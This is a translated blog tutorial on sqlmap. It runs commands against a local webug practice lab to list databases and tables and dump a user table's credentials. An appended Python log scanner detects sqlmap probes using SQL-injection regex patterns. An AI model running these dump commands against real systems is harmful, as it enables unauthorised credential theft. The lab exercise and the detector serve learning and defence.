Basic security testing drills 2: sqlmap

About sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers.

It has a powerful detection engine, many penetration-testing options for different database types, and features ranging from fetching data from the database to accessing the underlying file system and even executing operating system commands over an out-of-band connection.

It supports testing of MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and other database management systems.

It supports five different injection techniques:

Boolean-based blind: the truth of an injected condition is determined from the content of the returned page;

Time-based blind: nothing in the page content gives the result away, so the condition is judged by whether the injected statement delays the response (that is, whether the page's response time grows when the condition holds);

Error-based: the page returns a database error message, or the result of the injected statement is reflected directly in the page;

UNION query: injection that uses a UNION to append results to the original query;

Stacked queries: several statements are executed at once in a single injection.

Installing sqlmap is very simple: in a Python 2.7 environment, just run pip install sqlmap and it is ready to use.


Target machine demonstration

Now we run sqlmap against the SQL injection point we tested by hand earlier.

The simplest and crudest approach is to run the database enumeration command directly. It exposes the names of all databases on the current system:

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" --batch --dbs


Or, if we don't want to look so greedy and only want the name of the database used by the current SQL query:

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid --current-db


Next we enumerate the table names. This exposes the four tables under the pentesterlab database.

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid -D pentesterlab --tables


Next we expose the table columns. We need to dump the column data of the user table and save it to a local file, commonly called "dumping the database" (脱裤).

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid -D pentesterlab -T user --dump

With that, all the system usernames and passwords on our target machine are exposed. Simple, isn't it?
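From the defender's side, a run like the one above leaves a recognisable trail in the web server's access log: sqlmap's default User-Agent plus a burst of probes on the gid parameter that map onto the five injection techniques listed earlier. The following is an added example (not part of the original post or of sqlmap itself) that scans constructed Apache-style log lines and reports client IPs with repeated injection indicators; the log lines, IPs and thresholds are assumptions made up for the demo.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format). The path and
# parameter mirror the demo above; the probes are illustrative, not a real capture.
SAMPLE_LOG = """\
192.168.1.10 - - [10/Aug/2019:10:00:01 +0800] "GET /webug/pentest/test/sqli/sqltamp.php?gid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Aug/2019:10:00:02 +0800] "GET /webug/pentest/test/sqli/sqltamp.php?gid=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.3.8#stable (http://sqlmap.org)"
192.168.1.20 - - [10/Aug/2019:10:00:03 +0800] "GET /webug/pentest/test/sqli/sqltamp.php?gid=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Aug/2019:10:00:04 +0800] "GET /webug/pentest/test/sqli/sqltamp.php?gid=1%20UNION%20SELECT%20NULL HTTP/1.1" 500 120 "-" "Mozilla/5.0"
192.168.1.30 - - [10/Aug/2019:10:00:05 +0800] "GET /webug/pentest/test/sqli/sqltamp.php?gid=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# One indicator per technique named in the post (boolean, time-based, error-based,
# UNION, stacked), matched against the URL-decoded query string.
TECHNIQUES = {
    "boolean": re.compile(r"\b(and|or)\b\s+\S+\s*=\s*\S+", re.I),
    "time": re.compile(r"\b(sleep|benchmark|waitfor\s+delay|pg_sleep)\b", re.I),
    "error": re.compile(r"\b(extractvalue|updatexml|floor\s*\(\s*rand)\b", re.I),
    "union": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "stacked": re.compile(r";\s*(select|insert|update|drop|exec)\b", re.I),
}

def classify(line):
    """Return (client_ip, [indicators]) for one log line; an empty list means benign."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    hits = []
    if m["ua"].lower().startswith("sqlmap"):   # default sqlmap User-Agent
        hits.append("ua:sqlmap")
    query = unquote_plus(m["path"].partition("?")[2])
    hits += [f"sqli:{name}" for name, rx in TECHNIQUES.items() if rx.search(query)]
    return m["ip"], hits

def suspicious_sources(log_text, threshold=2):
    """Count flagged requests per client IP and return those at or above threshold."""
    per_ip = Counter()
    for line in log_text.splitlines():
        ip, hits = classify(line)
        if hits:
            per_ip[ip] += 1
    return {ip: n for ip, n in per_ip.items() if n >= threshold}
```

A real scan will also use a changed User-Agent (the --random-agent option), so the per-parameter payload patterns and the request rate per source matter more than the UA string alone.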


Demo video: https://asciinema.org/a/46601


Source: www.cnblogs.com/Zfc-Cjk/p/11367279.html